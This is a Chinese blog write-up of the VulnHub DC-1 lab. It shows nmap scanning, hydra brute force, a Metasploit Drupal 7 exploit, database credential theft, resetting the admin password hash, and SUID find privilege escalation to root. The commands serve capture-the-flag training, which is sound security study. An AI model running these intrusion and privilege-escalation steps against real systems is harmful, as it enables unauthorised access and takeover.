vulnub-dc-1
vulnhub的第二个靶机
靶机地址: https://www.vulnhub.com/entry/dc-1,292/.
知识点
nmap
用nmap扫描局域网内存活的主机,发现靶机的ip
nmap 192.168.88.0/24 -T4
用nmap进行更加详细的扫描,发现靶机开了以下的几个端口
nmap 192.168.88.137 -T4 -A -sV -p-
durpalCMS
端口:22 ——>爆破 ——>未成功
hydra -l root -P rockyou.txt 192.168.88.137 ssh
端口:80 ——>web漏洞——>成功
指纹识别,是drupal 7
扫描目录,得到后台地址和robots.txt文件,但爆破后台失败,发现无可利用的点。
./dirsearch.py --url http://192.168.88.137 -e php
Metasploit
把思路转向Metasploit,在kali中寻找该CMS的版本漏洞,因exp太多,不知道该用哪一个所以在msf中查找一下,把范围缩小
searchsploit drupal 7
search drupal
在这里我们用第四个exp,成功拿到shell(一个一个试)
shell
python -c "import pty;pty.spawn('/bin/bash')"
得到一个交互式的shell,在www目录下找到第一个flag,也提示了下一个flag和配置文件有关
百度可知drupal的数据库配置文件路径,也在数据库配置文件中拿到了第二个flag和一对帐号密码
dbuser:R0ck3t
百度可知drupal的数据库配置文件路径
数据库改密
用已知的数据库帐号密码进行登录,修改网站管理员的密码,达到登录后台的方法。
drupal的hash加密方法参考以下链接: drupalchina.cn/node/2128.
password: password hash:
update users set update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4' where name='admin';
用admin:password登录后台,在content左下角发现第三个flag
根据提示查看当前主机的用户,发现只有一个用户flag4,试着爆破一下,发现爆破成功。
用户名密码lag4:orange。登录到主机发现第四个flag,通过第四个flag知道最后一个flag在root目录下,也就是要拿到root权限。
suid之find提权
寻找可提权的信息,没有sudo也没有定时任务,但找到了find的suid权限,可通过find提权至root。
find / -type f -perm -u=s 2>/dev/null
touch 1
find 1 -exec "/bin/sh" \;
至此五个flag已经全部拿到。
ps:
个人站点博客:XingHe,欢迎来踩~